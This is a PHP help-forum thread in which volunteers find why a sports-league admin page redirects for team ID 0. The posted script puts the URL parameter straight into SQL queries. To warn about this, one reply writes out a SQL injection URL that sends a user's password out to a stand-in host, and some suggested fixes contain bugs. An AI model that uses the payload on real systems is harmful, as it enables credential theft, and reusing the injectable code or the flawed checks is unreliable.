PHP help needed. Webpage php script works for all teams except team "0"

[vbcoach]

Hello all. I have a bit of a strange situation that I'm scratching my head about. I have a Sports website and I have a simple script on this website that has been working for dozens of years, which recently has decided not to work properly - for only team "0".  When I run this webpage using this PHP script https://www.baltimorebeach.com/ap/viewTeam.php?t=2 this page works (as does all the other team pages) and this page does not https://www.baltimorebeach.com/ap/viewTeam.php?t=0 and I can't figure out why it is suddenly not working. It works with every other team except for team "0" which is my team.  Anyone have any thoughts on this? 

Thanks for your assistance.

[Psycho]

Without any code, there is no way to make any type of qualified assessment on what the problem is. But, I will venture a guess.

PHP is a "loosely" typed language. That means that variables can be used as different types. For example, you can use a string variable "2" as an integer 2. My guess is that there is some condition in the code that tests to see if the team ID is valid (i.e. not false). But, because the integer zero is also interpreted as the Boolean False the test is failing. Here is some mock code of what I am talking about:

if(isset($_GET['t'])) {
    $teamId = $_GET['t']
} else {
    $teamId = false;
}

if($teamId == false) {
    //Team ID is false, don't show the content
} else {
    //Show the team content
}

A team ID of zero will result in the error condition. You could correct THAT scenario by using the identical condition of !==. But, there can be multiple scenarios where a zero is being misinterpreted and you would have to look at each one to determine what the correct solution would be. There is a reason that most (all) databases start at 1 as the initial primary ID. Assuming this is a primary key in the DB, I would suggest changing that team's ID to a new unique number and updating all associated data.

[Barand]

On the subject of "loose typing of variables", version 8 of PHP is stricter than earlier versions. It could be that be that the failure now is due to an upgrade to this version from an old version.

What error messages are you getting?

[vbcoach]

Hi all.  I'm not getting any errors.  My page just reverts to my home page.  Now this .php?t=0 has been working for more than a dozen years without fail.  My PHP version is:  PHP Version 7.0.33

There have been no changes to this page in years.  Not sure why this fails the past few months.

[Psycho]

Well, obviously, something has changed. We have no access to the code, the web server, etc. I have provided a "best guess" based on the only piece of information provided: team id is 0. I still think the most likely cause is something due to the value being the value zero.

As to not seeing any errors, what level of error reporting do you have enabled. In a production environment, most errors should be suppressed. 

Have you even inspected the page viewTeam.php (and any included pages) to look at the code? Have you added any debugging logic to see where in the execution the logic is failing to do what you expect?

[dodgeitorelse3]

Please post your code in a code block so we can see what is actually going on. We can sit and guess all day without seeing your code.

[mac_gyver]

while zero is a valid number, it should have never been used as a data identifier. any chance you can go through and change to use the next higher unused id?

this could be anything from redirects without exit/die statements through to the database (strict) mode. this could even be due to obsolete html markup interacting with the latest version of a browser. if you cannot determine the cause of the problem, you will need to post all the code, less the database credentials, needed to reproduce the problem.

you state this reverts to the home page. what exactly does that mean, ap/index.php? you could be seeing the result of the last of multiple page requests/redirects, i.e. it could have displayed the expected output, but then redirected to the 'home page'.

Edited May 29 by mac_gyver

[gizmola]

You have been provided some plausible theories already.  As explained by Psycho, with loosely typed languages like PHP, type coercion is often used in logic statements, where zero is equivalent to false.  

You have been asked a number of times for some code to look at.  Days have now gone by, and still we have no code to analyze.  

You also have said that you get no errors, but I'm not sure if we can trust that information.  A production PHP site is typically set up to not display any errors, and usually to log them to a file instead.  Have you verified your configuration, and checked the relevant error file?

[vbcoach]

Hello gizmola.

Unfortunately we use a dedicated host at Network Solutions, so I don't have access to error reporting files and items like that.  I use an MS SQL server on a windows platform running HTML & PHP.  So I am quite limited on what I can do.  Again everything was working this way for more than a dozen years and with no changes in the code, this just started acting up in late March of this year.  Since it was a minor annoyance and affected only my team, I could make the changes on the back end in the database manually, but was curious why the heck this was happening in the first place.

 

<?php
require_once('seabass.php');

if(!$_GET['t'])
{
 header('Location: http://www.baltimorebeach.com');
}

$id = $_GET['t'];
$name = "admin";
//connect to DB and run queries

require_once('../database.php');

$query = "SELECT * FROM player WHERE team = $id";
$players = mssqlquery($query);
/*if(mssqlrowsaffectedX($players) != 1)
{
  mssqlclose();
  header('Location: http://www.baltimorebeach.com');
}
*/
$t_query = "SELECT t.*, l.* FROM team as t, league as l WHERE t.league = l.l_id AND t.t_id = $id";
$t_info = mssqlquery($t_query);
$team = mssqlfetchassoc($t_info);

$c_query = "SELECT * FROM captain WHERE c_id = $team[captain]";
$c_info = mssqlquery($c_query);
$cpt = mssqlfetchassoc($c_info);


//print_r($team);
//die();
//--------------------
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Baltimore Beach Control Panel</title>
<link rel="stylesheet" href="../cp/cpanel.css" type="text/css">
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script></head>

<body>


<table width="922" border="0" cellpadding="0" cellspacing="0">
  <tr>
    <td><img src="images/BBV_AP_top.jpg" width="922" height="200"></td>
  </tr>
  <tr>
    <td><table width="100%"  border="0" cellspacing="0" cellpadding="2">
      <tr>
        <td width="14%" class="menu"><div align="center"><a href="index.php">Admin Home</a> </div></td>
        <td width="17%" class="menu"><div align="center"><a href="viewLeague.php">View Spring League</a></div></td>
        <td width="16%" class="menu"><div align="center"><a href="viewCapt.php">View Captains</a> </div></td>
        <td width="19%" class="menu"><div align="center"><a href="viewSummerLeague.php">View Summer League </a></div></td>
        <td width="22%" class="menu"><div align="center"><a href="viewKahunaTournament.php">View Kahuna Tournament </a></div></td>
        <td width="8%" class="menu"><div align="center"></div></td>
        <td width="3%" class="menu"><div align="center"></div></td>
        <td width="1%" class="menu"><div align="center"></div></td>
      </tr>
    </table></td>
  </tr>
  <tr>
    <td><table width="923"  border="0" cellspacing="1" cellpadding="1">
      <tr>
        <td width="33%" align="left" valign="top"><br>
          <table width="100%"  border="0" cellpadding="2" cellspacing="0" class="grey2px">
            <tr>
              <td colspan="2" class="dk_greyTxt"><h3><strong>Captain's Information</strong></h3></td>
              </tr>
            <tr>
              <td width="41%" class="dk_greyTxt"><strong>Name</strong></td>
              <td width="59%"><?php echo $cpt['firstname'].' '.$cpt['lastname']; ?> </td>
            </tr>
            <tr>
              <td class="dk_greyTxt"><strong>Address</strong></td>
              <td><?php echo $cpt['address']; ?><br>
                  <?php echo "$cpt[city], $cpt[state] $cpt[zip]"; ?> </td>
            </tr>
            <tr>
              <td class="dk_greyTxt"><strong>Phone</strong></td>
              <td><?php echo $cpt['phone'] ?></td>
            </tr>
            <tr>
              <td class="dk_greyTxt"><strong>E-mail</strong></td>
              <td><a href="mailto:<?php echo $cpt['email'] ?>"><?php echo $cpt['email'] ?></a></td>
            </tr>
            <tr>
              <td class="dk_greyTxt"><strong>Shirt Size</strong></td>
              <td><?php echo $cpt['shirtsize'] ?></td>
            </tr>
            <tr>
              <td class="dk_greyTxt"><strong>Shirt Ordered</strong></td>
              <td><?php if($cpt['tsordered'] != '') 
	          {
			     echo "Yes in Order {$cpt['tsordered']}";
			  } 
			  else
			  {
			    echo 'No';
			  }  
	?></td>
            </tr>
            <tr>
              <td class="dk_greyTxt">&nbsp;</td>
              <td><form action="editCpt.php" method="post" name="cptform" id="cptform">
                  <input type="hidden" value="<?php echo $cpt['c_id'] ?>" name="cpt">
                  <input type="hidden" value="<?php echo $team['t_id'] ?>" name="team">
                  <input name="Submit" type="Submit" class="button" value="Edit Captain">
              </form></td>
            </tr>
          </table>
          <br></td>
        <td width="64%" rowspan="2" align="left" valign="top"><br>
          <table width="100%" cellpadding="1" cellspacing="0" class="grey2px">
            <tr class="dk_greyTxt">
              <td colspan="7"><h3><strong>Player's Information</strong></h3></td>
            </tr>
            <tr class="dk_greyTxt">
              <td width="18%" valign="bottom"><strong>Name</strong></td>
              <td width="21%" valign="bottom"><strong>E-mail</strong></td>
              <td width="21%" valign="bottom"><strong>Shirt Size</strong></td>
              <td width="8%" align="center" valign="bottom"><strong>Fee<br>
Paid</strong></td>
              <td width="9%" align="center" valign="bottom"><strong>Shirt<br>
                Ordered
              </strong></td>
              <td width="7%">&nbsp;</td>
              <td width="16%">&nbsp;</td>
            </tr>
            <?php 
		$i=0;
		while($row = mssqlfetchassoc($players))
		{
		 
		?>
            <tr <?php if($i%2 == 0) echo "class='altbg'";?> >
              <td><?php echo $row['name'] ?></td>
              <td><?php echo $row['email'] ?></td>
              <td align="center"><?php echo $row['pshirt'] ?></td>
              <td align="center"><?php if($row['feepaid'] == 'y') 
	          {
			    echo "<img src='images/check.gif' />";
			  } 
			  else
			  {
			    echo 'No';
			  }  
	?></td>
              <td align="center"><?php if($row['ptsordered'] != '') 
	          {
			    echo "<img src='images/check.gif' /> {$row['ptsordered']}";
			  } 
			  else
			  {
			    echo 'No';
			  }  
	?></td>
              <td>
               <?php
			if($row['ptsordered'] == '')
			{
			?>
                  <form name="player<?= $row['p_id'] ?>" action="editPlayer.php" method="get">
                  <input type="hidden" name="p" value="<?= $row['p_id'] ?>">
                  <input name="Submit" type="submit" class="button" value="Edit">
              </form>
            <?php
			}
			?>
            </td>
      
             <td><form name="del_player<?= $row['p_id'] ?>" action="remPlayer.php" method="post" onSubmit="return(confirm('Are you sure you want to delete <?= $row['name']?>?\n\nThis cannot be reversed'))">
                  <input type="hidden" name="p" value="<?= $row['p_id'] ?>">
                  <input type="hidden" name="t" value="<?= $id ?>">                  
                  <input name="Submit" type="submit" class="button" value="Remove">
              </form></td>
            </tr>
            <?php $i++; } ?>
            
			<tr><td colspan="7">&nbsp;</td></tr>
			<tr bgcolor="FFCB00"><td colspan="7" align="right"><a href="addPlayer.php?t=<?= $id ?>"><strong>
				Add Player</strong></a></td>
			</tr>
          </table></td>
      </tr>
      <tr>
        <td align="left" valign="top"><br>
          <table width="100%"  border="0" cellpadding="2" cellspacing="0" class="grey2px">
            <tr>
              <td colspan="2" class="dk_greyTxt"><h3>Team Information </h3></td>
              </tr>
            <tr>
              <td width="27%" class="dk_greyTxt"><strong>Name</strong></td>
              <td width="73%"><?php echo $team['teamname']; ?> (<a href="editTeam.php?t=<?= $team['t_id'] ?>">edit 
				team</a>)</td>
            </tr>
            <tr>
              <td class="dk_greyTxt"><strong>League</strong></td>
              <td><?php echo "$team[night] $team[type] $team[size]s"; ?></td>
            </tr>
            <tr>
              <td class="dk_greyTxt"><strong>Division</strong></td>
              <td><?php echo $team['division'] ?></td>
            </tr>
            <tr>
              <td class="dk_greyTxt"><strong>Registration Date </strong></td>
              <td>
                <?php //ho $team['reg_start']
                $date = date_create($team['reg_start']);
                 echo date_format($date, 'M j Y, g:i a');
                ?> 
                </td>
            </tr>
            <?php
	  if($cpt['feepaid'] == 'n')
	  {
	 ?>
            <tr>
              <td class="dk_greyTxt">&nbsp;</td>
              <td><form name="payfee" action="setTeamPaid.php" method="post">
                  <input type="hidden" value="<?php echo $cpt['c_id'] ?>" name="cpt">
                  <input type="hidden" value="<?php echo $team['t_id'] ?>" name="id">
                  <br>
                  <strong>Fee Payment Info:</strong><br>
                  <textarea name="feememo" rows="4" id="feememo"></textarea>
                  <br>
                  <input name="Submit" type="Submit" class="button" value="Team Fee Paid">
              </form></td>
            </tr>
            <?php
	  }
	  else
	  {
	 ?>
            <tr>
              <td class="dk_greyTxt"><strong>Registration Completed </strong></td>
              <td><?php 
              //echo $team['reg_done'] 
                 $date = date_create($team['reg_done']);
                 echo date_format($date, 'M j Y, g:i a');
              ?>
            </td>
            </tr>
            <?php
	}
	?>    
  <?php mssqlclose(); ?>
    
        
     
            <tr>
              <td align="left" class="dk_greyTxt"><strong>Returning Team</strong></td>
              <td align="left">
                <?php if($cpt['returningteam'] > '0' && $cpt['returningteam']!='no') echo "Yes"; else echo "No"; ?>&nbsp;&nbsp;&nbsp;&nbsp;
                    <input type="radio" name="radio" id="Spring" value="Spring" <?php if($cpt['returningteam'] == '1') echo "checked"; ?>>
                <label for="Spring">Returning Team</label></td>
            </tr>
            <tr>
              <td align="left" class="dk_greyTxt"><strong>Returning Team Name</strong></td>
              <td align="left"><?php echo $cpt['rteamname'] ?></td>
            </tr>
         
            <tr>
              <td align="left" class="dk_greyTxt"><strong>Locked in </strong></td>
              <td align="left"><?php if($team['locked']) echo "Yes"; else echo "No"; ?>            </tr>
            <tr>
              <td align="left" class="dk_greyTxt"><strong>Promo Code </strong></td>
              <td align="left"><?php echo $team['promocode'] ?>              
              </tr>

            <tr>
              <td class="dk_greyTxt"><strong>Record </strong></td>
              <td>&nbsp;</td>
            </tr>
            <tr>
              <td class="dk_greyTxt">&nbsp;</td>
              <td><form action="removeTeam.php" method="post" name="deleteform" id="deleteform" onSubmit="return(confirm('Are you sure you want to delete this team?\n\nThis cannot be reversed'))">
                  <input type="hidden" value="<?php echo $cpt['c_id'] ?>" name="cpt">
                  <input type="hidden" value="<?php echo $team['t_id'] ?>" name="id">
                  <input name="Submit" type="Submit" class="button" value="Remove Team">
					<br>
<font size="2">IP: <?php echo $team['ip']; ?></font></form></td>
            </tr>
            </table></td>
        </tr>
    </table></td>
  </tr>
</table>
<br>
</body>
</html>

 

 

[mac_gyver]

1 hour ago, vbcoach said:

if(!$_GET['t'])
{
 header('Location: http://www.baltimorebeach.com');
}

this is the problem. a zero is a false value and the code is performing the header redirect.

as to why it 'worked' before,  something was probably preventing the header() from working (output being sent, which would have been producing a php error, should you have been able to display/log it) but since there's no exit/die statement after the redirect, the rest of the code on the page still ran in this case, so, you got the expected output for a zero value.

something probably changed in the server configuration, such as php's output_buffing setting getting turned on, which would now buffer whatever the output is, allowing the header() to work.

i wonder if your login access check code has exit/die statements after redirects to stop the rest of the code on the page from being executed?

you should also not put any external data directly into sql queries, where any sql special characters can break the sql query syntax, which is how sql injection is accomplished.

Edited June 3 by mac_gyver

[Psycho]

As @mac_gyver stated, the problem is that line to check if the 't' value was sent. The way it is constructed, that condition will return true if the value is not set OR if the value is interpreted as false (which a zero value will be). You state that this was working for over 12 years and no changes were made to the code. I find that unlikely as PHP would have always interpreted a 0 as false in that condition (as far as I am aware). Perhaps that condition was previously written in a more explicit manner to account for a team ID of zero. E.g. 

if(!isset($_GET['t']) || ($_GET['t']===false)

And someone looked at it and thought the code was more complicated than it needed to be and "fixed" it to be simpler.

So, your issue turned out to be exactly what I had hypothesized. You can either find all instances where teamID may be used in your code to ensure that a zero value will always work (poor fix) or (the right solution) change the primary key for that team to another value and then change the foreign key references to that ID.

 

 

[gizmola]

I want to also offer a simple fix for the huge sql injection hole this code has.   At least in this script you can somewhat mitigate it by "casting" the url parameter to an integer.

 

// change

$id = $_GET['t'];

// To

$id = (int)$_GET['t'];

 

Usually this would work well, as in most systems there won't be a row with an id of zero.  

 

If for example, someone tries to pass a url parameter like this one, it could be really bad:

https:...yoursite.com?t= 1+and+exists(select+*+from+fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select+pass+from+users+where+id=1)%2b'.3w39ricodvyzuq0ood.somebadsite.net\1.xem',null,null))

 

Casting the get parameter to an integer would safely convert all that attempted sql injection code to  0.

You have the unfortunate situation that you decided to have a zero id, so you can't use that as a safety net now.  It's not the only nor best way to harden a system from sql injection attacks, but it is a simple and longstanding one, when your system intrinsically works with integer keys.

 

With that said, I took Psycho's code and tweaked it a bit, which will at least get your system working again with 0, and will protect against sql injection, but this problem could exist throughout the other scripts, and fixing this one problem may not make it usable for you again. 

To be clear replace the first few lines with these lines:

 

<?php
require_once('seabass.php');

if (!isset($_GET['t']) || !is_int($_GET['t') || $_GET['t'] < 0)
{
 header('Location: http://www.baltimorebeach.com');
}

 

And at least with this script your zero id team should load again.

[vbcoach]

Outstanding!  As you can tell, I am not a coder.  I implemented your changes, but I am now getting this error:

Parse error: syntax error, unexpected ';' in \\WDP\DFS\30\1\9\6\3007726691\user\sites\5346834.site\www\ap\viewTeam.php on line 6

[Psycho]

Looks like @gizmola missed a right square bracket on the second $_GET value. Try:

if (!isset($_GET['t']) || !is_int($_GET['t']) || $_GET['t'] < 0)
{
     header('Location: http://www.baltimorebeach.com');
}

 

[vbcoach]

Yeah I saw that - fixed that myself - still getting the same error

Will try again...

Nope!  That didn't work.  No error but still sends me back to home page.

 

[mac_gyver]

7 hours ago, Psycho said:

is_int

this checks the datatype of the variable, not what's in the variable. get, post, cookies are by definition strings, regardless of what value they hold. change this to is_numeric().

[vbcoach]

Yes that worked perfectly, thanks so much!

[gizmola]

I should have checked the is_int manual page, and should have seen that it checks PHP's internal type. 

Thanks to Psycho and mac_gyver we got you there, but just to be complete, is_numeric will pass many numbers through that are not integers.  To really do the job well, this is what I should have offered up from the beginning (and also takes advantage of the typecasting I wrote about.

 

if (!isset($_GET['t']) || !is_numeric($_GET['t']) || !is_int((int)$_GET['t'] || $_GET['t'] < 0)
{
     header('Location: http://www.baltimorebeach.com');
     exit;                                                                                      
}

 

It is always very important that location redirects are followed by an exit, because redirection is a function of the browser.  The server is basically saying:  "you go here", but it is up to the browser to actually follow that instruction.  Bots and artificial clients may not play by the rules.

So the script should at that point exit, so that no additional code is run, or access restriction bypassed.